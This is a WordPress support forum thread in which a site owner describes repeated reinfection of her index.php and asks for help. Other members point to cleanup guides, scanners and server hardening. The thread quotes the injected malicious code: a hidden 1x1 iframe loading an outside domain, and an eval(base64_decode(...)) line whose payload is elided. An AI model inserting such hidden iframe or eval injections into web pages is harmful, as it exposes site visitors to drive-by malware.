Forums

WordPress › Support » How-To and Troubleshooting

How am I still getting hacked? (17 posts)

  1. drummergirl
    Member
    Posted 11 months ago #

    Hello - I have a site that's been running for 5 years and never been hacked. Yesterday, I noticed some code had been inserted at the very top of my header that looks like this:

    <iframe src="http://ghxwfea.cz.cc/go/1" width="1" height="1"></iframe><br />

<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/girlcaw6/public_html/index.php(1) : eval()'d code:37) in <b>/home/girlcaw6/public_html/wp-content/plugins/bad-behavior/bad-behavior/screener.inc.php</b> on line <b>8</b><br />

    The code is not in my header.php theme file, but is rendered when the site loads. Reinstalling wordpress 3.1.3 gets rid of it, but within a couple of hours it is back. Last night I reset all my ftp passwords, but this morning it still shows the bad code.

    Disabling plugins does not remove the iframe, however disabling bad behavior does kill the warning message. Is the bad behavior plugin the problem or is it just conflicting with the hack? What else can I do to keep this from happening?

  2. drummergirl
    Member
    Posted 11 months ago #

    Still happening every hour. Plugins are updated as is WP. All unused plugins have been deleted. Ftp passwords changed.

    Anywhere else I should look? I'm currently scanning my files to see where it's being inserted.

  3. esmi
    Theme Diva & Forum Moderator
    Posted 11 months ago #

    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

  4. govpatel
    Member
    Posted 11 months ago #

    I would Check your own computer see you are infected if that is ok then if you are shared host account check with your host.

  5. drummergirl
    Member
    Posted 11 months ago #

    I'm on a Mac and it came up clean. The site is on my VPS and none of my other sites on the same VPS are not affected. Is there anything else I should check?

  6. drummergirl
    Member
    Posted 11 months ago #

    Ok MacKeeper anti-virus just alerted me to a chrome cache file:

    infected.webpage.gen

    That's just a cache file from my site, right? That wouldn't be the root cause, correct?

  7. drummergirl
    Member
    Posted 11 months ago #

    Day #3 and it's still showing up...

    Mac scanned - no issues other than my site's pages getting flagged in chrome cache

    Windows VM scanned - no issues

    All site files downloaded and scanned - nothing found

    FTP password changed, admin password changed.

    Any other ideas?

  8. brightim
    Member
    Posted 11 months ago #

    You may want to look closer at Bad Behavior. It may be behaving badly.

    http://dilithiumcrystalworks.com/2011/02/27/bad-behavior-wordpress-plugin/

  9. smrdo
    Member
    Posted 11 months ago #

    try this plug in on your wp install http://wordpress.org/extend/plugins/antivirus/,

    We had this Iframe injection on one of our sites too, do a search accross all the site files, wp installl, everthing for the Iframe, ours was embeded at the top of one the wordpress include php files, cant remember which one now, once found delete it.

    It make sense to change all you usernames & passwords too.

    Also check out some of the security plugins for WP.

  10. drummergirl
    Member
    Posted 11 months ago #

    @brightim - I removed bad behavior completely last night, but I was hacked again this morning.

    @smrdo - I ran that already. Didn't find anything. :/

    I have narrowed it down to the index.php as the only file being affected whenever it happens. I just need to figure out what is triggering it.

    At the moment I submitted a ticket to my VPS company to run a full scan on my server.

  11. songdogtech
    Member
    Posted 11 months ago #

    Securing a VPS is usually entirely different than inexpensive shared hosting. You're going to have to get the VPS company - or learn yourself on how - to dig in and fix the security problems with ports, permissions, MySQL, etc.

  12. drummergirl
    Member
    Posted 11 months ago #

    I may have to pay them to manage it. I got kicked off shared hosting because my site grew too big. I'm not on a VPS because I want to be there. :/

  13. drummergirl
    Member
    Posted 11 months ago #

    Just happened again:

    this is what is inserted into the index.php file:

    eval(base64_decode('...yada yada yada....'));

    How do I track down where it is coming from? All passwords have been changed. I've scanned my wp-content folder both online and off. Ideas?

  14. drummergirl
    Member
    Posted 11 months ago #

    Can I chmod that file to keep it from getting changed or will that prevent wordpress from working properly?

  15. songdogtech
    Member
    Posted 11 months ago #

    Please edit your post and delete the php code.

    Possible causes: open ports that shouldn't be open. PHP configs that make you vulnerable. Wrong file/folder permissions. SSH attacks. Attacks from other sites on your VPS. Malware in the database. Old plugins. FTP instead of SFTP.

  16. songdogtech
    Member
    Posted 11 months ago #

    Can I chmod that file to keep it from getting changed or will that prevent wordpress from working properly?

    Simply a bandaid and a waste of time - if it happens to work.

  17. drummergirl
    Member
    Posted 11 months ago #

    I agree it's a bandaid - I'm just concerned about not resolving this before I have to leave on a trip next week.

    If the bandaid would get me through a few days of no internet access, it may be my only option until I return. Still waiting on the VPS techs to report back to me.

Reply

You must log in to post.

About this Topic

Tags

No tags yet.